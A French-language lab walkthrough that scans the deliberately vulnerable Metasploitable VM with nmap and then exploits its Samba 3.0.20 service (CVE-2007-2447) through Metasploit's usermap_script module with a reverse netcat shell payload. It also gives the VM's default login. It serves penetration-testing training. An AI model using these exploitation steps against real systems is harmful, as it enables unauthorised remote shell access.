Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette VM peut être utilisée pour mener une formation à la sécurité, tester des outils de sécurité et pratiquer des techniques communes de test de pénétration. L’identifiant et le mot de passe par défaut sont msfadmin:msfadmin.
Recherche des services
Nmap (« Network Mapper ») est un utilitaire pour la découverte de réseaux et l’audit de sécurité. C’est donc lui que nous utiliserons pour rechercher les ports ouverts, les services et les versions des services rattachées à ces ports. Pour chercher les ports ouverts, les services ainsi que les versions nous tapons nmap -sV @ip
Après avoir découvert les services rattachées à ces ports, nous pouvons lancer un scan de vulnérabilité via cette commande nmap -sV -v -A --script=vuln @ip
-v= la verbeuse sert à afficher plus de détails sur le processus de scan en cours.
-A= effectue un scan intensif et fournit un maximum d’infos utiles
–script=vuln= permet de lancer un scan de vulnérabilités en utilisant des scripts spécifiques du NSE (Nmap Scripting Engine) qui recherchent des failles de sécurité connues sur la cible.
Après l’exécution de cette commande nous apercevons différents résultats dont le statut de la version des services(vulnérable ou non),les CVE ainsi que la technique du scan utilisée dont Le SYN Stealth Scan ou scan furtif qui est une technique de scan de ports dans Nmap utilisée pour détecter les ports ouverts sans établir de connexion complète.
une fois cette étape terminée nous pouvons utiliser Metasploit Framework qui permet pour tester la sécurité des systèmes en exploitant des vulnérabilités connues. Il est principalement utilisé en pentesting et en recherche de failles.En regardant en arrière sur les résultats de l’analyse, un port particulier attrape mon œil, Port 445 fonctionnant sous Samba 3.0.20. Après ce scan, j’ai trouvé une vulnérabilité (CVE 2007-2447), nous allons donc ouvrir metasploit et taper search CVE 2007-2447
on tape use exploit/multi/samba/usermap_script
pour charger cet exploit
on tape set payload cmd/unix/reverse_netcat
car un payload est recommandé ici; vous remarquerez que le payload est chargé
Après cela nous tapons show options
pour voir les options obligatoires que nous devons renseignées; ce cas ci nous devons renseigner que l’adresse ip de la cible(RHOSTS) donc on tape set RHOSTS + @ip de la cible
; après avoir renseigné ces information nous tapon run ou exploit
et si tout a été bien configuré vous aurez la même chose que cette image
Si vous avez cette même image c’est chouette car vous avez piraté la machine et vous pouvez maintenant taper des commandes Linux